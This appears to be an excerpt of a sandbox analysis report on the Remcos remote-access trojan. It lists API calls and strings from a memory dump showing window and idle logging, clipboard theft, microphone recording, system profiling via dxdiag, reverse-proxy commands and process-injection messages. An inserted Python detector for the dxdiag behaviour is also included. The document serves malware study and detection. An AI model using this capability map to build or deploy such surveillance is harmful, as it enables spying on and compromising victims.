                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID: \&G$\&G$`&G
                                  • API String ID: 269201875-253610517
                                  • Opcode ID: 0a05fa7fafc3926735f9ff598043b48751ea8cfb3e4d07056946ce3260a8f3c6
                                  • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                  • Opcode Fuzzy Hash: 0a05fa7fafc3926735f9ff598043b48751ea8cfb3e4d07056946ce3260a8f3c6
                                  • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 65535$udp
                                  • API String ID: 0-1267037602
                                  • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                  • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                  • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                  • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                  APIs
                                  • __Init_thread_footer.LIBCMT ref: 0040AD73
                                  • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                  • GetForegroundWindow.USER32 ref: 0040AD84
                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                  • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                  • String ID: [${ User has been idle for $ minutes }$]
                                  • API String ID: 911427763-3954389425
                                  • Opcode ID: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                  • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                  • Opcode Fuzzy Hash: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                  • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                  APIs
                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LongNamePath
                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                  • API String ID: 82841172-425784914
                                  • Opcode ID: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                  • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                  • Opcode Fuzzy Hash: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                  • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                  • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                  • __dosmaperr.LIBCMT ref: 0043A926
                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                  • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                  • __dosmaperr.LIBCMT ref: 0043A963
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                  • __dosmaperr.LIBCMT ref: 0043A9B7
                                  • _free.LIBCMT ref: 0043A9C3
                                  • _free.LIBCMT ref: 0043A9CA
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                  • String ID:
                                  • API String ID: 2441525078-0
                                  • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                  • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                  • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                  • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                  APIs
                                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                  • TranslateMessage.USER32(?), ref: 0040557E
                                  • DispatchMessageA.USER32(?), ref: 00405589
                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                  • API String ID: 2956720200-749203953
                                  • Opcode ID: 39c70f7a9fb62d047285317ad68f4ff50d9b26878aa9747946ac0a7af0469701
                                  • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                  • Opcode Fuzzy Hash: 39c70f7a9fb62d047285317ad68f4ff50d9b26878aa9747946ac0a7af0469701
                                  • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                  APIs
                                    • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                  • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                  • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                  • String ID: 0VG$0VG$<$@$Temp
                                  • API String ID: 1704390241-2575729100
                                  • Opcode ID: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                  • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                  • Opcode Fuzzy Hash: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                  • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                  APIs
                                  • OpenClipboard.USER32 ref: 0041697C
                                  • EmptyClipboard.USER32 ref: 0041698A
                                  • CloseClipboard.USER32 ref: 00416990
                                  • OpenClipboard.USER32 ref: 00416997
                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                  • CloseClipboard.USER32 ref: 004169BF
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                  • String ID: !D@
                                  • API String ID: 2172192267-604454484
                                  • Opcode ID: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                  • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                  • Opcode Fuzzy Hash: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                  • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                  APIs
                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                  • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                  • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                  • CloseHandle.KERNEL32(?), ref: 004134A0
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                  • String ID:
                                  • API String ID: 297527592-0
                                  • Opcode ID: 22386a43a60047858d5371973b5e3297a85e3cc3c05708fada6b2de72b5e662f
                                  • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                  • Opcode Fuzzy Hash: 22386a43a60047858d5371973b5e3297a85e3cc3c05708fada6b2de72b5e662f
                                  • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ControlManager
                                  • String ID:
                                  • API String ID: 221034970-0
                                  • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                  • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                  • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                  • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                  APIs
                                  • _free.LIBCMT ref: 004481B5
                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                  • _free.LIBCMT ref: 004481C1
                                  • _free.LIBCMT ref: 004481CC
                                  • _free.LIBCMT ref: 004481D7
                                  • _free.LIBCMT ref: 004481E2
                                  • _free.LIBCMT ref: 004481ED
                                  • _free.LIBCMT ref: 004481F8
                                  • _free.LIBCMT ref: 00448203
                                  • _free.LIBCMT ref: 0044820E
                                  • _free.LIBCMT ref: 0044821C
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                  • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                  • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                  • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Eventinet_ntoa
                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                  • API String ID: 3578746661-3604713145
                                  • Opcode ID: 10eb1960a8d8ce6813e19caa070b236760d69188d96698ceea7a474dae621fae
                                  • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                  • Opcode Fuzzy Hash: 10eb1960a8d8ce6813e19caa070b236760d69188d96698ceea7a474dae621fae
                                  • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                  APIs
                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DecodePointer
                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                  • API String ID: 3527080286-3064271455
                                  • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                  • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                  • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                  • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                  APIs
                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                  • __fassign.LIBCMT ref: 0044B4F9
                                  • __fassign.LIBCMT ref: 0044B514
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B559
                                  • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B592
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                  • String ID: PkGNG
                                  • API String ID: 1324828854-263838557
                                  • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                  • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                  • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                  • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                  APIs
                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                  • Sleep.KERNEL32(00000064), ref: 0041755C
                                  • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateDeleteExecuteShellSleep
                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                  • API String ID: 1462127192-2001430897
                                  • Opcode ID: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                  • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                  • Opcode Fuzzy Hash: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                  • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
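The function above collects a host profile by launching `dxdiag` with `/t` to write `sysinfo.txt` into the temp directory, reading it back and deleting it. The following is an added example, not code from the report or from the sample, showing how that pattern can be flagged in process-creation telemetry. The `ProcEvent` field names are an assumption modelled on Sysmon Event ID 1 style records, and the sample events at the bottom are constructed for the demo (the RegAsm.exe parent mirrors the host process seen in this analysis).

```python
"""Flag dxdiag-based system-profile collection in process-creation telemetry.

Added example, not Joe Sandbox or Remcos code. Field names on ProcEvent are an
assumed schema (image / command_line / parent_image), not a real product's.
"""
import ntpath
import re
from dataclasses import dataclass

# Parents from which a user or an installer would normally launch dxdiag.
_EXPECTED_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "msiexec.exe"}

# Temp-like report locations: AppData\Local\Temp, C:\Windows\Temp, any \temp\.
_TEMP_RE = re.compile(r"(\\appdata\\local\\temp\\|\\windows\\temp\\|\\temp\\)", re.I)

# dxdiag's "/t <path>" switch; the path may be quoted or bare.
_DXDIAG_T_RE = re.compile(r'(?:^|\s)/t\s+(?:"([^"]+)"|(\S+))', re.I)


@dataclass
class ProcEvent:
    image: str          # full path of the started process
    command_line: str   # its command line
    parent_image: str   # full path of the parent process


@dataclass
class Finding:
    report_path: str
    reasons: list


def is_dxdiag_report_to_temp(ev: ProcEvent):
    """Return a Finding when ev is dxdiag writing a text report in a suspicious way.

    A bare `dxdiag /t` is something admins do by hand, so at least one extra
    signal (temp-directory target or an unexpected parent) is required.
    """
    if ntpath.basename(ev.image).lower() != "dxdiag.exe":
        return None
    m = _DXDIAG_T_RE.search(ev.command_line)
    if not m:
        return None
    report_path = m.group(1) or m.group(2)
    reasons = ["dxdiag /t report"]
    if _TEMP_RE.search(report_path):
        reasons.append("report written to temp directory")
    parent = ntpath.basename(ev.parent_image).lower()
    if parent not in _EXPECTED_PARENTS:
        reasons.append(f"unexpected parent {parent}")
    if len(reasons) < 2:
        return None
    return Finding(report_path=report_path, reasons=reasons)


def scan(events):
    """Run the check over a list of ProcEvent and return the Findings."""
    return [f for f in (is_dxdiag_report_to_temp(e) for e in events) if f]


# Constructed sample events (not real telemetry from the analysis).
SAMPLE_EVENTS = [
    ProcEvent(  # what the function above produces: RegAsm.exe -> dxdiag /t %temp%\sysinfo.txt
        image=r"C:\Windows\System32\dxdiag.exe",
        command_line=r"dxdiag /t C:\Users\user\AppData\Local\Temp\sysinfo.txt",
        parent_image=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
    ),
    ProcEvent(  # admin running dxdiag by hand into a normal folder: not flagged
        image=r"C:\Windows\System32\dxdiag.exe",
        command_line=r'dxdiag /t "C:\reports\dx.txt"',
        parent_image=r"C:\Windows\System32\cmd.exe",
    ),
    ProcEvent(  # unrelated process: ignored
        image=r"C:\Windows\System32\notepad.exe",
        command_line="notepad.exe",
        parent_image=r"C:\Windows\explorer.exe",
    ),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.report_path, "->", "; ".join(f.reasons))
```

Because the report file is deleted a moment after it is read, file-creation telemetry alone is easy to miss; the process-creation record is the durable artefact, and the short `Sleep` between launch and delete is the reason to alert on the launch rather than on the file.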
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentProcess
                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                  • API String ID: 2050909247-4242073005
                                  • Opcode ID: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                  • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                  • Opcode Fuzzy Hash: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                  • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                  APIs
                                  • _strftime.LIBCMT ref: 00401D50
                                    • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                  • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                  • API String ID: 3809562944-243156785
                                  • Opcode ID: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                  • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                  • Opcode Fuzzy Hash: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                  • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                  • int.LIBCPMT ref: 00410EBC
                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                  • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                  • String ID: ,kG$0kG
                                  • API String ID: 3815856325-2015055088
                                  • Opcode ID: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                  • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                  • Opcode Fuzzy Hash: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                  • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                  APIs
                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                  • waveInStart.WINMM ref: 00401CFE
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                  • String ID: dMG$|MG$PG
                                  • API String ID: 1356121797-532278878
                                  • Opcode ID: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                  • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                  • Opcode Fuzzy Hash: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                  • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                    • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                    • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                    • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                  • TranslateMessage.USER32(?), ref: 0041D57A
                                  • DispatchMessageA.USER32(?), ref: 0041D584
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
